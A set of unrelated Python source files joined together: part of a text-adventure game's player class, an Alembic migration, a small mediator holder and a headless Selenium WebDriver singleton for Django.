if n_args == 1:
# add a dummy argument
def _f(self, noun):
return f(self)
func = _f
# preserve (but change) docstring
func.__doc__ = "decorated by :func:`textgame.player.player_method`\n\n"\
+ (f.__doc__ if f.__doc__ else "")
elif n_args > 2:
raise TypeError("Action methods can't have more than 2 arguments")
return func
def action_method(f):
"""wrapper for player methods
does the same as :func:`textgame.player.player_method` plus it adds to the return
value of the original function the output of :func:`textgame.world.World.update`.
This way it is guaranteed that time passes and fights get managed when the player
does something.
Also, this saves the undecorated function in a new attribute ``f.undecorated``.
"""
func = player_method(f)
# append self.world.update to the end of every method
def _f(self, noun):
msg = func(self, noun)
if type(msg) is str:
# the other possibility is EnterYesNoLoop
msg += self.world.update(self)
return msg
# save the undecorated function
# reason: one might want to call action_methods from other action_methods,
# in this case nested decorations lead to bugs bc of multiple calls
# on world.update
_f.undecorated = f
# preserve (but change) docstring
_f.__doc__ = "decorated by :func:`textgame.player.action_method`\n\n"\
+ (f.__doc__ if f.__doc__ else "")
return _f
class Player:
"""class to represent the player of the game
- holds an instance of :class:`textgame.world.World` so that its methods can have the widest possible impact on the game
- ``self.location`` contains the room the player is currently in, ``self.oldlocation`` contains the previous location
- ``self.inventory`` is a dict mapping the item's IDs to the items the player is carrying
- ``self.status`` tracks the player's status: ``{"alive": True, "fighting": False, "trapped": False}``
"""
def __init__(self, world, initlocation):
self.location = initlocation
self.oldlocation = None
# player must know of the whole world so that he can
# move to other places quickly (eg.)
self.world = world
self.score = 0
self.age = 0 # TODO: maybe this is redundant with world.time
# dict to contain all the items the player is carrying
self.inventory = OrderedDict()
self.status = {"alive": True, "fighting": False, "trapped": False}
self.random = random.Random()
logger.debug("seeding player with {}".format(self.world.seed+42))
self.random.seed(self.world.seed+42)
@action_method
def go(self, direction):
"""
change location to the room in the direction ``noun``. ``noun`` can be
in :class:`textgame.globals.DIRECTIONS` or 'back'. On different inputs, return
:class:`textgame.globals.MOVING.FAIL_NOT_DIRECTION`
"""
if direction == "back":
return self.goback()
elif not direction:
return MOVING.FAIL_WHERE
elif direction not in DIRECTIONS:
return MOVING.FAIL_NOT_DIRECTION
# this line is in player.cpp but it makes no sense?
# self.location.check_restrictions(self)
if self.status["trapped"]:
return MOVING.FAIL_TRAPPED
elif self.status["fighting"]:
# running away from a fight will kill player
self.status["alive"] = False
return MOVING.DEATH_BY_COWARDICE
else:
destination = self.location.doors[direction]
# see if there is a door
if destination:
# see if door is open
if not self.location.locked[direction]["closed"]:
# how does moving to this direction look like?
dir_description = self.location.dir_descriptions[direction]
# move, but remember previous room
self.oldlocation = self.location
self.location = destination
# spawn monsters before describing the room
self.world.spawn_monster(destination)
# check if room is dark etc, plus extrawürste
msg = self.location.check_restrictions(self)
# if the room is not dark, add dir_description to the beginning
if not self.location.dark["now"] and dir_description:
msg = dir_description + '\n' + msg
msg += self.location.describe()
if not self.location.visited:
self.score += self.location.visit()
return msg
else:
return MOVING.FAIL_DOOR_LOCKED
else:
return self.location.errors[direction]
def goback(self):
"""
change location to previous location if there's a connection
"""
if self.oldlocation == self.location:
return MOVING.FAIL_NO_MEMORY
# maybe there's no connection to oldlocation
if not self.oldlocation in self.location.doors.values():
return MOVING.FAIL_NO_WAY_BACK
else:
# find in which direction oldlocation is
for dir,dest in self.location.doors.items():
if dest == self.oldlocation:
direction = dir
break
return type(self).go.undecorated(self, direction)
@action_method
def close(self, direction):
"""
lock the door in direction ``noun`` if player has a key in inventory
that fits
"""
return self._close_or_lock("lock", direction)
@action_method
def open(self, direction):
"""
open the door in direction ``noun`` if player has a key in inventory
that fits
"""
return self._close_or_lock("open", direction)
def _close_or_lock(self, action, direction):
if direction not in DIRECTIONS:
return ACTION.FAIL_OPENDIR.format(action)
# check if there's a door
if not self.location.doors[direction]:
return MOVING.FAIL_NO_DOOR
# check if door is already open/closed
if action=="open" and not self.location.locked[direction]["closed"]:
return ACTION.ALREADY_OPEN
elif action=="lock" and self.location.locked[direction]["closed"]:
return ACTION.ALREADY_CLOSED
# check if there are any items that are keys
if any([i.key for i in self.inventory.values()]):
# get all keys and try them out
keys = [i for i in self.inventory.values() if i.key]
for key in keys:
if key.key == self.location.locked[direction]["key"]:
# open/close the door, depending on action
self.location.locked[direction]["closed"] = (action == "lock")
return ACTION.NOW_OPEN.format(action)
return ACTION.FAIL_OPEN
return ACTION.FAIL_NO_KEY
@action_method
def take(self, itemid):
"""
see if something with the ID ``noun`` is in the items of the current
location. If yes and if it's takable and not dark, remove it from location
and add it to inventory
"""
if not itemid:
return ACTION.WHICH_ITEM.format("take")
elif itemid == "all":
return self.takeall()
if self.location.dark["now"]:
return DESCRIPTIONS.DARK_S
if itemid in self.inventory:
return ACTION.OWN_ALREADY
item = self.location.items.get(itemid)
if item:
if item.takable:
# move item from location to inventory
self.inventory[itemid] = self.location.items.pop(itemid)
return ACTION.SUCC_TAKE.format(item.name)
return ACTION.FAIL_TAKE
elif itemid in self.location.description:
return ACTION.FAIL_TAKE
return ACTION.NO_SUCH_ITEM.format(itemid)
def takeall(self):
"""
move all items in the current location to inventory
"""
if not self.location.items:
return DESCRIPTIONS.NOTHING_THERE
if self.location.dark["now"]:
return DESCRIPTIONS.DARK_S
response = []
for itemid in list(self.location.items.keys()):
response.append(type(self).take.undecorated(self, itemid))
return '\n'.join(response)
@action_method
def list_inventory(self):
"""
return a pretty formatted list of what's inside inventory
"""
if self.inventory:
response = "You are now carrying:\n A "
response += '\n A '.join(i.name for i in self.inventory.values())
return response
return ACTION.NO_INVENTORY
@action_method
def drop(self, itemid):
"""
see if something with the ID ``noun`` is in the inventory. If yes, remove
it from inventory and add it to location
"""
if not itemid:
return ACTION.WHICH_ITEM.format("drop")
if itemid == "all":
return self.dropall()
if not itemid in self.inventory:
return ACTION.FAIL_DROP
# move item from inventory to current room
self.location.add_item( self.inventory.pop(itemid) )
return ACTION.SUCC_DROP
def dropall(self):
"""
move all items in the inventory to current location
"""
if not self.inventory:
return ACTION.NO_INVENTORY
for item in list(self.inventory.keys()):
# type(self) may be Player or a derived class from player
type(self).drop.undecorated(self, item)
return ACTION.SUCC_DROP
@action_method
def attack(self, monstername):
"""
kill a monster based on randomness, the monster's strength and on how
long the fight has been going already. Die if killing fails too often.
If the history of the monster is -1, the monster's ``ignoretext`` gets returned.
"""
if not monstername:
return FIGHTING.WHAT
monsters = [m for m in self.location.monsters.values() if m.name==monstername]
# should be max 1
if len(monsters) == 0:
# maybe there's a dead one?
if monstername in [m.name for m in self.location.items.values()]:
return FIGHTING.ALREADY_DEAD.format(monstername)
return FIGHTING.NO_MONSTER.format(monstername)
elif len(monsters) == 1:
monster = monsters[0]
if monster.status["singleencounter"]:
return FIGHTING.ALREADY_GONE.format(monstername)
monster.status["fighting"] = True
if monster.history == -1:
return monster.ignoretext
elif monster.history < 2:
if self.random.random() > monster.strength-monster.history/10:
monster.kill()
return FIGHTING.ATTACK
elif monster.history == 2:
if self.random.random() > monster.strength-0.2:
monster.kill()
return FIGHTING.LAST_ATTACK
self.status["alive"] = False
return FIGHTING.DEATH
else:
logger.error("There's currently more than one monster with "
"name {} in room {}. This should not be possible!".format(monstername, self.location.id))
@action_method
def show_score(self):
return INFO.SCORE.format(self.score)
def forget(self):
"""
set old location to current location
"""
self.oldlocation = self.location
@action_method
def look(self):
"""
get the long description of the current location.
Also spawn monsters and check check_restrictions (see :func:`textgame.room.Room.check_restrictions`)
"""
# spawn monsters before describing the room
self.world.spawn_monster(self.location)
# check if room is dark etc, plus extrawürste
msg = self.location.check_restrictions(self)
msg += self.location.describe(long=True)
return msg
@action_method
def listen(self):
"""
get the current room's sound
"""
return self.location.sound
def has_light(self):
"""
returns true if player carries anything that lights a room up
"""
return any([lamp in self.inventory for lamp in LIGHT])
@player_method
def ask_hint(self):
"""
ask for a hint in the current location,
if there is one, return :class:`textgame.parser.EnterYesNoLoop` if the hint
should really be displayed
"""
warning, hint = self.location.get_hint()
if not hint:
return INFO.NO_HINT
def hint_conversation():
warning, hint = self.location.get_hint()
self.score -= self.location.hint_value
return hint
# stuff hint_conversation inside the EnterYesNoLoop,
# this will be called during conversation
return EnterYesNoLoop(
question = warning,
yes = hint_conversation,
no = "ok."
)
|
"""added directionality
Revision ID: 2de7150f9351
Revises: 85b225ba7bce
Create Date: 2021-08-27 10:06:09.044287
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = '2de7150f9351'
down_revision = '85b225ba7bce'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('dataset', sa.Column('directionality', sa.String(length=64), nullable=True))
op.alter_column('session', 'session_object',
existing_type=mysql.LONGTEXT(),
type_=sa.Text(length=1000000000),
existing_nullable=True)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('session', 'session_object',
existing_type=sa.Text(length=1000000000),
type_=mysql.LONGTEXT(),
existing_nullable=True)
op.drop_column('dataset', 'directionality')
# ### end Alembic commands ###
|
#We want a single reference for the mediator to be used in all classes.
#For now just make it a static class variable
from mediator import Mediator
class MediatorResource:
Mediator = Mediator()
|
from django.conf import settings
import logging
from selenium import webdriver
from retry import retry
logger = logging.getLogger(__name__)
class WebDriverSingleton(object):
_instance = None
@classmethod
def instance(cls):
if cls._instance is None:
cls._instance = WebDriverSingleton()
return cls._instance
@retry(delay=1, tries=5)
def __init__(self):
options = webdriver.ChromeOptions()
options.add_argument('headless')
driver_path = settings.DRIVER_PATH
if settings.DEV_ENV:
chrome_driver = webdriver.Chrome(driver_path, chrome_options=options)
else:
options.binary_location = driver_path
chrome_driver = webdriver.Chrome(executable_path="chromedriver", chrome_options=options)
logger.info('Initialized web driver')
self.chrome_driver = chrome_driver
def shutdown(self):
self.chrome_driver.close()
logger.info('Shutting down web driver')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.